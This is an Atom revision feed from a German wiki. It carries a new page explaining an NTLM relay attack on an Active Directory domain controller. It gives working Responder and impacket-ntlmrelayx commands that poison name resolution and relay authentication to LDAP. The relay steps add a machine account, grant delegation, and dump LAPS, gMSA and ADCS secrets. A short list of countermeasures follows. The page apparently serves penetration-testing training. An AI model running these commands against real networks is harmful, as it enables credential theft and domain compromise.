<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="de">
	<id>https://wiki.ixheim.de/index.php?action=history&amp;feed=atom&amp;title=NTLM-Relay-Angriff_mit_Impacket%3A_Dom%C3%A4nenkompromittierung_via_LDAP</id>
	<title>NTLM-Relay-Angriff mit Impacket: Domänenkompromittierung via LDAP - Versionsgeschichte</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.ixheim.de/index.php?action=history&amp;feed=atom&amp;title=NTLM-Relay-Angriff_mit_Impacket%3A_Dom%C3%A4nenkompromittierung_via_LDAP"/>
	<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=NTLM-Relay-Angriff_mit_Impacket:_Dom%C3%A4nenkompromittierung_via_LDAP&amp;action=history"/>
	<updated>2026-06-28T18:52:52Z</updated>
	<subtitle>Versionsgeschichte dieser Seite in Xinux Wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=NTLM-Relay-Angriff_mit_Impacket:_Dom%C3%A4nenkompromittierung_via_LDAP&amp;diff=63146&amp;oldid=prev</id>
		<title>Thomas.will: Die Seite wurde neu angelegt: „= NTLM-Relay-Angriff mit Impacket: Domänenkompromittierung via LDAP =  == Ziel == Ein Angreifer leitet die NTLM-Authentifizierung eines Windows-Clients auf ei…“</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=NTLM-Relay-Angriff_mit_Impacket:_Dom%C3%A4nenkompromittierung_via_LDAP&amp;diff=63146&amp;oldid=prev"/>
		<updated>2025-05-18T13:00:30Z</updated>

		<summary type="html">&lt;p&gt;Die Seite wurde neu angelegt: „= NTLM-Relay-Angriff mit Impacket: Domänenkompromittierung via LDAP =  == Ziel == Ein Angreifer leitet die NTLM-Authentifizierung eines Windows-Clients auf ei…“&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Neue Seite&lt;/b&gt;&lt;/p&gt;&lt;div&gt;= NTLM-Relay-Angriff mit Impacket: Domänenkompromittierung via LDAP =&lt;br /&gt;
&lt;br /&gt;
== Ziel ==&lt;br /&gt;
Ein Angreifer leitet die NTLM-Authentifizierung eines Windows-Clients auf einen Domain Controller (DC) um, um:&lt;br /&gt;
* Benutzer-Hashes zu stehlen (für Passwort-Cracking oder Pass-the-Hash)&lt;br /&gt;
* Schädliche Gruppenrichtlinien (GPOs) zu erstellen&lt;br /&gt;
* Neue Benutzer mit Admin-Rechten anzulegen&lt;br /&gt;
&lt;br /&gt;
== Voraussetzungen ==&lt;br /&gt;
* Netzwerkzugriff zum Ziel-Subnetz&lt;br /&gt;
* LLMNR/NBT-NS-Poisoning aktiv auf Zielgeräten&lt;br /&gt;
* SMB-Signing nicht erzwungen auf dem DC&lt;br /&gt;
* Domain Controller mit LDAP/SMB-Exposition&lt;br /&gt;
&lt;br /&gt;
== Angriffsablauf ==&lt;br /&gt;
&lt;br /&gt;
=== Schritt 1: Responder für Poisoning konfigurieren ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
responder -I eth0 -wrf&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
* &amp;lt;code&amp;gt;-I&amp;lt;/code&amp;gt;: Netzwerkinterface&lt;br /&gt;
* &amp;lt;code&amp;gt;-w&amp;lt;/code&amp;gt;: WPAD-Rogue-Server&lt;br /&gt;
* &amp;lt;code&amp;gt;-rf&amp;lt;/code&amp;gt;: Aktiviere FTP/SMB-Rogue-Server&lt;br /&gt;
&lt;br /&gt;
=== Schritt 2: NTLM-Relay auf LDAP starten ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
impacket-ntlmrelayx -t ldap://dc01.domain.local -smb2support \&lt;br /&gt;
--remove-mic --add-computer --delegate-access \&lt;br /&gt;
--dump-laps --dump-gmsa --dump-adcs&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Schritt 3: Erfolgreichen Relay nutzen ===&lt;br /&gt;
Nach erfolgreichem Relay erscheinen gesammelte Daten:&lt;br /&gt;
* Benutzer-Hashes&lt;br /&gt;
* LAPS-Passwörter&lt;br /&gt;
* GMSA-Konten&lt;br /&gt;
* ADCS-Zertifikate&lt;br /&gt;
&lt;br /&gt;
== Schutzmaßnahmen ==&lt;br /&gt;
* LLMNR/NBT-NS deaktivieren&lt;br /&gt;
* SMB-Signing erzwingen&lt;br /&gt;
* LDAP-Signing und Channel Binding aktivieren&lt;br /&gt;
* NTLM vollständig deaktivieren (Kerberos bevorzugen)&lt;/div&gt;</summary>
		<author><name>Thomas.will</name></author>
	</entry>
</feed>